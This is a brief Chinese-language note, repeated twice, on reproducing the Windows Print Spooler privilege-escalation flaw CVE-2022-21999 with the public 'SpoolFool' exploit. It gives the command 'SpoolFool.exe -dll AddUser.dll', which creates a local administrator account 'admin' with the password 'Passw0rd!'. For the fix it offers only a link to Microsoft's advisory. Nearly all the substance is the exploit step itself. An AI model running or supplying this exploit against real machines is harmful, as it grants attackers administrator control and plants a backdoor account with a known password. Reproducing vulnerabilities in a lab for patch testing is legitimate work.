漏洞复现
exp地址:SpoolFool
下载解压:
输入命令,会生成一个本地管理员admin的用户。
admin / Passw0rd!
SpoolFool.exe -dll AddUser.dll
漏洞修复
参考:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999
exp地址:SpoolFool
下载解压:
输入命令,会生成一个本地管理员admin的用户。
admin / Passw0rd!
SpoolFool.exe -dll AddUser.dll
参考:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999